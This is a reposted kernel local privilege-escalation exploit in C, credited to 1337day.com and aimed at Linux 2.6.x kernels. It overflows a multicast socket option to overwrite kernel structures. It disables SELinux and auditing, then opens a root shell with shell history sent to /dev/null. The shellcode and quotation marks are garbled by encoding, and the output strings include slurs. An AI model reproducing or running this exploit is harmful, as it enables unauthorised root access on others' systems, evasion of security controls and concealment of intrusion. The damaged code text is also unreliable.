enero 17, 2012
11:12

[local exploits] – Linux Kernel-2.6.30 2010 Local Root Exploit

====================================================
kernel-2.6.30 2010 Local Root Exploit
====================================================
Author : Th3 L0rd Dilaw [GarA]
Home : Mafia Hack Team & www.Arhack.net
Exploit DataBase: 1337day.com
Gr33tz : Dr.Sayros & Last breath & Dr.BiLLi &
Dr.Milas & O-Snip3r & El Boss Gangster
This Local work also on :
2.6.30 .10 /*/ 2.6.30 .1 /*/ 2.6.30 -rc6 /*/ 2.6.30 -rc5 /*/ 2.6.30 -rc3 /*/ 2.6.30 -rc2 /*/ 2.6.30 -rc1 /*/
====================================================
#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>
#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy
#define VERT "33[32m"
#define NORM "33[0m"
#define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4yn"
#define KALLSYMS "/proc/kallsyms"
#define TMAGIC_66TDFDRTS "/proc/timer_list"
#define SELINUX_PATH "/selinux/enforce"
#define RW_FOPS "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
#define TRY_REMAP_DEFAULT 1
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)
static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];
#define R0C_0FF 14
static char ttrg0ccc[]=
"x51×57x53×56x48×31xc9×48x89xf8×48x31xf6xbex41×41x41×41"
"x3bx30×75x1fx3bx70×04x75×1ax3bx70×08x75×15x3bx70×0c"
"x75×10x48×31xdbx89×18x89×58x04×89x58×08x89×58x0cxebx11"
"x48xffxc0×48xffxc1×48x81xf9×4cx04×00x00×74x02"
"xebxccx5ex5bx5fx59xc3";
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"x53×52x57×48xbbx41×41x41×41x41×41x41×41xffxd3"
"x50×48x89xc7×48xbbx42×42x42×42x42×42x42×42"
"xffxd3×48x31xd2×89x50×04x89×50x14×48x89xc7"
"x48xbbx43×43x43×43x43×43x43×43"
"xffxd3×5fx5fx5ax5bxc3";
#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"x57×50x65×48x8bx3cx25×00x00×00x00"
"x48xb8×41x41×41x41×41x41×41x41xffxd0"
"x58×5f"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"xc3";
/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"x0fx01xf8×65x48×8bx3cx25×00x00×00x00"
"x48xb8×41x41×41x41×41x41×41x41xffxd0"
"x0fx01xf8"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x90×90x90×90x90×90x90×90x90×90"
"x48xcf";
#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23
static char dis4blens4sel1nuxhayettgdr64545[]=
"x41×52x50"
"xb8×00x00×00x00"
"x49xbax41×41x41×41x41×41x41×41"
"x41×89x02"
"x49xbax42×42x42×42x42×42x42×42"
"x41×89x02"
"x58×41x5a";
/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98
struct LSM_rhel
{
__yyrhdgdtfs66ytgetrfd selinux_ops;
__yyrhdgdtfs66ytgetrfd capability_ops;
__yyrhdgdtfs66ytgetrfd dummy_security_ops;
__yyrhdgdtfs66ytgetrfd selinux_enforcing;
__yyrhdgdtfs66ytgetrfd audit_enabled;
const char *krelease;
const char *kversion;
};
struct LSM_rhel known_targets[4]=
{
{
0xffffffff8031e600ULL,
0xffffffff8031fec0ULL,
0xffffffff804acc00ULL,
0xffffffff804af960ULL,
0xffffffff8049b124ULL,
"2.6.18-164.el5",
"#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes
},
{
0xffffffff8031f600ULL,
0xffffffff80320ec0ULL,
0xffffffff804afc00ULL,
0xffffffff804b2960ULL,
0xffffffff8049e124ULL,
"2.6.18-164.11.1.el5",
"#1 SMP Wed Jan 6 13:26:04 EST 2010"
},
{
0xffffffff805296a0ULL,
0xffffffff8052af60ULL,
0xffffffff806db1e0ULL,
0xffffffff806ddf40ULL,
0xffffffff806d5324ULL,
"2.6.18-164.11.1.el5xen",
"#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen
},
{
0xffffffff8031f600ULL,// d selinux_ops
0xffffffff80320ec0ULL,// d capability_ops
0xffffffff804afc00ULL,// B dummy_security_ops
0xffffffff804b2960ULL,// B selinux_enforcing
0xffffffff8049e124ULL,// B audit_enabled
"2.6.18-164.11.1.el5",
"#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
}
};
static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;
struct socketcallAT
{
int s;
int level;
int optname;
void *optval;
volatile socklen_t *optlen;
}__attribute__((packed));
struct idt64from32_s
{
unsigned short limit;
unsigned long base;
}__attribute__((packed));
static __yyrhdgdtfs66ytgetrfd getidt()
{
struct idt64from32_s idt;
memset(&idt, 0×00, sizeof(struct idt64from32_s));
asm volatile("sidt %0" : "=m"(idt));
return idt.base | 0xFFFFFFFF00000000ULL;
}
static int isSelinuxEnabled()
{
FILE *selinux_f;
selinux_f = fopen(SELINUX_PATH, "r");
if(selinux_f == NULL)
{
if(errno == EPERM)
return 1;
else
return 0;
}
fclose(selinux_f);
return 1;
}
static int wtfyourunhere_heee(char *out_release, char* out_version)
{
int ret; const char*ptr;
int count=0;
char r[32], *bptr;
struct utsname buf;
ret = uname(&buf);
if(ret < 0)
return -1;
strcpy(out_release, buf.release);
strcpy(out_version, buf.version);
ptr = buf.release;
bptr = r;
memset(r, 0×00, sizeof(r));
while(*ptr)
{
if(count == 2)
{
if(*ptr >= ‘0′ && *ptr <= ‘9′)
*bptr++ = *ptr;
else
break;
}
if(*ptr == ‘.’)
count++;
ptr++;
}
if(strlen(r) < 1 || !atoi(r))
return -1;
return atoi(r);
}
static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}
static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
FILE *ka;
char line[512];
char reloc_a[64];
char reloc[64];
if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
return 0;
ka = fopen(filename, "r");
if(!ka)
return 0;
while(fgets(line, 512, ka) != NULL)
{
char *l_p = line;
char *ra_p = reloc_a;
char *r_p = reloc;
memset(reloc, 0×00, sizeof(reloc));
memset(reloc_a, 0×00, sizeof(reloc_a));
while(*l_p != ‘ ‘ && (ra_p – reloc_a) < 64)
*ra_p++ = *l_p++;
l_p += 3;
while(*l_p != ‘ ‘ && *l_p != ‘n’ && *l_p != ‘t’ && (r_p – reloc) < 64)
*r_p++ = *l_p++;
if(!strcmp(reloc, s))
{
__gggdfstsgdt_dddex("$$$ %s->%sn", s, reloc_a);
return strtoull(reloc_a, NULL, 16);
}
}
return 0;
}
static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
return get_sym_ex(s, KALLSYMS, 0);
}
static int parse_cred(const char* val)
{
int i=0;
const char* p = val;
char local[64], *l;
for(i=0; i<3; i++)
{
memset(local, 0×00, sizeof(local));
l = local;
while(*p && *p != ‘,’)
*l++ = *p++;
if(!(*p) && i != 2)
return -1;
_m_cred[i] = strtoull(local, NULL, 16);
p++;
}
return 0;
}
#define SELINUX_OPS "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS "capability_ops"
#define SELINUX_ENFORCING "selinux_enforcing"
#define AUDIT_ENABLED "audit_enabled"
struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
int i;
char mapbuf[128];
struct LSM_rhel *lsm = &(known_targets[0]);
if(check_rhel && !isRHHGDPPLADSF(krelease))
{
__pppp_tegddewyfg("!!! N0t a RH3l k3rn3l n");
return NULL;
}
__pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. n");
for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
{
if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion))
{
__gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s n", lsm->krelease, lsm->kversion);
return lsm;
}
}
__pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t…n");
strcpy(mapbuf, "/boot/System.map-");
strcat(mapbuf, krelease);
dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);
if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
!dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
!dyn4nt4n1labeggeyrthryt.capability_ops ||
!dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
!dyn4nt4n1labeggeyrthryt.audit_enabled)
return NULL;
return &dyn4nt4n1labeggeyrthryt;
}
static void put_your_hands_up_hooker(int argc, char *argv[])
{
int fd,ver,ret;
char __b[16];
fd = open(KALLSYMS, O_RDONLY);
ret = read(fd, __b, 16); // dummy read
if((fd >= 0 && ret > 0))
{
__pppp_tegddewyfg("$$$ Kallsyms +rtn"); // d0nt p4tch m3 br0
flags |= KERN_HHSYPPLORQTWGFD;
}
close(fd);
ver = wtfyourunhere_heee(krelease, kversion);
if(ver < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!n");
__gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %sn", krelease);
if(argc != 1)
{
while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0)
{
switch(ret)
{
case ‘i’:
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
useidt=1; // u have to use -i to force IDT Vector
break;
case ‘f’:
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
break;
case ‘l’:
flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
break;
case ‘c’:
if(!optarg || parse_cred(optarg) < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3zn");
break;
case ‘k’:
if(optarg)
_m_fops = strtoull(optarg, NULL, 16);
else
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rsn");
break;
case ’s’:
if(!isSelinuxEnabled())
__pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?n");
else
flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
break;
case ‘o’:
if(optarg)
_m_cpu_off = strtoull(optarg, NULL, 16);
else
__yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rsn");
break;
}
}
}
if(ver >= 29) // needs cred structure
{
flags |= KERN_DGGDYDTEGGETFDRLAK;
if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
{
_m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
_m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
_m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
}
if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2])
{
__yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3zn");
}
__pppp_tegddewyfg("$$$ Kernel Credentials detectedn");
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
}
if(ver >= 30) // needs cpu offset
{
flags |= KERN_DHHDYTMLADSFPYT;
if(!_m_cpu_off)
_m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
if(!_m_cpu_off)
__yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3zn");
__pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!tn");
*((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
*((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
}
}
static void env_prepare(int argc, char* argv[])
{
put_your_hands_up_hooker(argc, argv);
if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops
{
__pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34dn");
if(!_m_fops)
_m_fops = get_sym(RW_FOPS);
/* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
* Thanks to the guy who killed this vector… you know who you are:)
* Lucky for you, there are more:)
*/
if(_m_fops)
{
usefops=1;
__pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzzn");
}
}
if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
{
curr_target = lsm_rhel_find_target(1);
if(!curr_target)
{
__pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3′ll s33 ab0ut th4t!n");
}
else
uselsm=1;
}
if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
// -i flag
curr_target = lsm_rhel_find_target(0);
if(!curr_target)
{
__pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.n");
/* remove Selinux Flag */
flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
}
}
if(!usefops && !useidt && !uselsm)
__yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0ln");
}
static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
int socklen_l = 8 + stack – addr – 16;
return socklen_l;
}
static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] =
{0×00100000UL,
0×0020ee00UL,
0×00000000UL,
0×00000000UL};
static void fillsocketcallAT()
{
at.s = s;
at.level = SOL_IP;
at.optname = MCAST_MSFILTER;
at.optval = buffer;
at.optlen = &magiclen;
}
static void bitch_call(struct socketcallAT *at, void *stack)
{
asm volatile(
"push %%ebxtn"
"push %%esitn"
"push %%ecxtn"
"push %%edxtn"
"movl $0×66, %%eaxtn"
"movl $0xf, %%ebxtn"
"movl %%esp, %%esitn"
"movl %0, %%ecxtn"
"movl %1, %%esptn"
"int $0×80tn"
"movl %%esi, %%esptn"
"pop %%edxtn"
"pop %%ecxtn"
"pop %%esitn"
"pop %%ebxtn"
: : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi"
);
}
static void __setmcbuffer(__dgdhdytrg55 value)
{
int i;
__dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
*(p+i) = value;
}
static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
int i;
__dgdhdytrg55 curr;
for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++)
{
curr = idtover[i];
__setmcbuffer(curr);
magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP);
bitch_call(&at, (void*)Y0Y0STOP);
}
}
static void y0y0stack()
{
void* map = mmap((void*)Y0Y0SMAP,
PAGE_SIZE,
PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}
static void y0y0code()
{
void* map = mmap((void*)Y0Y0CMAP,
PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,
#else
PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");
}
static int rey0y0code(unsigned long old)
{
int fd;
void *map;
volatile char wizard;
char cwd[1024];
getcwd(cwd, sizeof(cwd));
strcat(cwd, "/__tmpfile");
unlink(cwd);
fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
if(fd < 0)
return -1;
write(fd, (const void*)old, PAGE_SIZE);
if(munmap((void*)old, PAGE_SIZE) < 0)
return -1;
map = mmap((void*)old,
PAGE_SIZE,
PROT_READ|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED,
fd,0);
if(map == MAP_FAILED)
return -1;
/* avoid lazy page fault handler
* Triple Fault when using idt vector
* and no pages are already mapped:)
*/
wizard = *((char*)old);
unlink(cwd);
return wizard;
}
int main(int argc, char*argv[])
{
int uid,fd;
__yyrhdgdtfs66ytgetrfd *patch, idtb;
struct pollfd pfd;
printf(BANNER);
uid = getuid();
env_prepare(argc, argv);
y0y0stack();
y0y0code();
if(useidt)
{
idtb = getidt();
__gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llxn", idtb);
__pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 – IDT m3th34dn");
patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
__pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3zn");
if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
{
__pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34tn");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
}
else if(usefops || uselsm)
{
__pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 – F0PZzzZzZZ/LSD(M) m3th34dn");
patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
*patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
__setmcbuffer(J0J0S);
__pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3zn");
if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
__pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34tn");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
}
/* set shellcode level 2 */
if(flags & KERN_DGGDYDTEGGETFDRLAK)
{
__pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3zn");
__dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
}
else
{
__pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llzn");
__dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));
*((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
}
__pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4ln");
s = socket(AF_INET, SOCK_DGRAM, 0);
if(s < 0)
__xxxfdgftr_hshsgdt("socket");
fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
if(rey0y0code(Y0Y0CMAP) < 0)
__yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1ttn");
#endif
if(useidt)
{
__yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
__gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %dn", 0xdd);
idt_smash((idtentry));
sleep(1);
asm volatile("int $0xddtn");
}
else if(usefops)
{
magiclen = get_socklen(_m_fops, Y0Y0STOP);
magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
__gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%xn", magiclen);
__pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3ntn");
bitch_call(&at, (void*)Y0Y0STOP);
sleep(1);
fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
if(fd < 0)
__xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);
}
else if(uselsm)
{
int msqid;
__yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
__yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
__yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
msqid = msgget(0, IPC_PRIVATE|0600);
if(msqid < 0)
__xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");
magiclen = get_socklen(selinux_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(dummy_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(capability_msg_off, Y0Y0STOP);
__setmcbuffer(J0J0S);
bitch_call(&at, (void*)Y0Y0STOP);
magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP);
__setmcbuffer(0);
bitch_call(&at, (void*)Y0Y0STOP);
msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
}
munmap((void*)Y0Y0CMAP, PAGE_SIZE);
/* exec */
if(getuid() == 0)
{
pid_t pid;
__pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4  ppPpPPpPPPpPn");
pid = fork();
if(pid == 0)
{
char *args[] = {"/bin/sh", "-i", NULL};
char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null", "HISTFILE=/dev/null", "HISTFILESIZE=0",
"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
execve("/bin/sh", args, envp);
}
else
{
int status;
waitpid(pid, &status, 0);
}
}
else
__pppp_tegddewyfg("!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!n");
close(s);
return 0;
}
# [1337day.com][1] [2011-09-30]
[1]: http://www.1337day.com/
Source: http://www.1337day.com/exploits/16993